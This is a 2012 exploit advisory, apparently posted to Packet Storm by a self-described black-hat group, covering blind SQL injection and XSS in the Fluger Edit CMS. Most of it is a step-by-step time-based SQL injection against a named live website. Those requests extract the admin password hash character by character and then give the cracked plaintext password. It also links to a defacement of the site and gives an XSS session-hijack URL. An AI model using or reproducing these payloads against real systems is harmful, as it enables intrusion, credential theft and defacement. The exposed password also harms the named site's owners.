Fluger Edit version 2 suffers from cross site scripting and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.
776957ea2e591ce4de92073c69025a61eb40469401729fc6ccd644600e0fcd1f=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================
Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012
************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************
======================================================
FULLY disclosured Real Exploitation examples:
GPC MUST BE=OFF
Theris Blind SQLi vulnerability on login page:
http://www.artclima.am/edit/ <===(Admin panel)
Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php
(Sorry i have no access to source code)
CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png
Due authentication mechanism you can't bypass login form by sending:
'or''='
Instead of you can use Time Based Way to obtain logins:password from admin table.
Here we go:
Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png
http://www.artclima.am/edit/index.php?error
Headers:
Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
POST DATA:
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
*REPLAY*
loginde Blind varidir.
Bypass getmir.
Time Based RuleZ!
www.artclima.am/edit/index.php?error
columnlar:
user
password
table: admin
=========================================
1 user var:
//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir
cekek logini
login: admin
//TRUE
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir
parolu cekek:
=========================================
1-ci simvol: e
username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
2-ci simvol: 0
username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
3-cu simvol: 4
username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
4-cu simvol: 4
username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
5-ci simvol: 6
username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
6-ci simvol: 5
username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
7-ci simvol: 0
username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
8-ci simvol: a
username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
9-cu simvol: 5
username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
10-cu simvol: 6
username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
11-ci simvol: 7
username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
12-ci simvol: e
username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
13-cu simvol: d
username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
yoxla sonra
=========================================
14-cu simvol: 2
username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
15-ci simvol: b
username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
16-ci simvol: 2
username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
17-ci simvol: d
username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18-ci simvol: 0
username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
19-cu simvol: 4
username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
20-ci simvol: 3
username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
21-ci simvol: 0
username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
22-ci simvol: 3
username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
23-cu simvol: e
username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
24-cu simvol: 3
username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
25-ci simvol: 7
username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
26-ci simvol: 9
username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
27-ci simvol: 3
username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
28-ci simvol: d
username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
29-cu simvol: f
username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
30-cu simvol: d
username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
31-ci simvol: 9
username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
32-ci simvol: 5
username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
Verification: +
//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
MD5: e044650a567ed2b2d04303e3793dfd95
Resolves to: price777
Sure! I will "rm"-it too with great pleasure!
Rmned: http://zone-h.org/mirror/id/18295382
Second way: Session Hijack to gain access to admin panel:
XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1
Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png
From source code of page:
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td> </td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >
==========================THE END=========================
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
/AkaStep
02.09.2012
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed